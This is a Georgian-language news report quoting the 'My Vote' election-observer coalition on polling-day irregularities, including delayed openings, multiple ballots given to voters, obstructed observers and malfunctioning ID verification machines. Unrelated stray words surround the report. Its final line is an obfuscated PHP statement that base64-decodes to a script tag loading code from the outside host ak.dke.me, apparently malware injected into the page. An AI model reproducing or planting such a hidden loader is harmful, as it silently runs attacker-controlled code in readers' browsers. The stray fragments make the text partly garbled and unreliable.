celsiusi
ავერსი შნაიდერი

ქართული სამოქალაქო ორგანიზაციების კოალიციური სადამკვირვებლო მისია - “ჩემი ხმის” ინფორმაციით, 69 უბანზე კენჭისყრა დაიწყო დაგვიანებით, 36 საარჩევნო უბანზე გახსნის პროცესზე დამკვირვებლებს ხელი შეეშალათ.

როგორც ორგანიზაციის ხელმძღვანელმა, ლონდა თოლორაიამ განაცხადა, 13 უბანზე დაიწერა საჩივრები, ხოლო 17 უბანზე გაკეთდა შენიშვნა უბნის ჩანაწერთა წიგნში.

"საარჩევნო უბნების უმრავლესობა, სადაც კოალიცია აკვირდებოდა გახსნის პროცედურებს, დროულად იყო მზად პირველი ამომრჩევლის მისაღებად, თუმცა დამკვირვებლების ინფორმაციით, ათობით საარჩევნო უბანზე (დაკვირვების ქვეშ მყოფი უბნების 7%-ზე) კენჭისყრა დაგვიანებით დაიწყო.

უკიდურესად საყურადღებოა, რომ დაფიქსირდა უბნებზე ამომრჩევლებისთვის ერთზე მეტი ბიულეტენის გადაცემის 25-მდე შემთხვევა (1-ელ, მე-2, მე-3, მე-5, მე-6, მე-7 ოლქებში), კახეთსა (მე-12, და მე-14, მე-17 და მე-20 ოლქებში) და ბათუმში (79-ე ოლქი). ასევე, დაფიქსირდა ორი ბიულეტენით ხმის მიცემის მცდელობა - 35-ე, 38-ე და 37-ე საარჩევნო ოლქებში. ცხადია, ეს გაყალბების მაღალ რისკებს ქმნის. მსგავსი შემთხვევები გამოიწვევს შემაჯამებელ ოქმებში ბალანსის დადგენის პრობლემას. შესაძლებელია, აღნიშნული, ასევე, მიზნად ისახავდეს საარჩევნო უბნის შედეგების ბათილობის საფუძვლის ხელოვნურად შექმნას ან სხვა ტიპის მანიპულაციას.

გარკვეულ საარჩევნო უბნებზე ვერიფიკაციის აპარატების განლაგების გამო დამკვირვებლებს არ ეძლევათ რეგისტრატორის საქმიანობის დაკვირვების შესაძლებლობა. ასევე, ინფრასტრუქტურის/ტექნიკის არახელსაყრელი განლაგების გამო დამკვირვებლებს არ ჰქონდათ ვერიფიკაციის აპარატის დაკვირვების შესაძლებლობა. ასეთი დარღვევები დაფიქსირდა მე-13 ოლქის 25-ე უბანზე, მე-12 ოლქის მე-4 უბანზე, 21-ე ოლქის 52-ე უბანზე, მე-20 ოლქის 54 უბანზე, მე-7 ოლქის მე-13 და მე-14 უბნებზე, მე-5 ოლქის 46-ე უბანზე, 64-ე ოლქის პირველ და 32-ე უბნებზე.

ამის პარალელურად, მთელი საქართველოს მასშტაბით, ფიქსირდება ვერიფიკაციის აპარატებთან დაკავშირებული ტექნიკური პრობლემები. ვერიფიკაციის აპარატები ვერ არეგისტრირებენ ამომრჩეველთა პირადობის მოწმობებს და რეგისტრატორებს ხელით უწევთ მონაცემების აპარატებში შეყვანა. შექმნილი ვითარება, დამკვირვებლებს არ აძლევს საშუალებას დარწმუნდნენ მართებულად ხდება თუ არა უბანზე გამოცხადებული პირის იდენტიფიცირება. იმ ფონზე, როდესაც წინასაარჩევნო პერიოდში ვრცელდებოდა ინფორმაცია მოქალაქეებისთვის პირადობის მოწმობების ჩამორთმევის შესახებ, მსგავსი ტენდენცია განსაკუთრებით საყურადღებოა.

ათენის 2 საარჩევნო უბანზე კოალიციის დამკვირვებლებს დაკვირვების საშუალება არ მისცეს.

მნიშვნელოვანი ინციდენტები: დამკვირვებლის/წარმომადგენლის/მედიის უფლებების უკანონო შეზღუდვა, უბანზე დამკვირვებლების დაშვებასთან დაკავშირებული პრობლემები", - განაცხადა ლონდა თოლორაიამ.

73
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");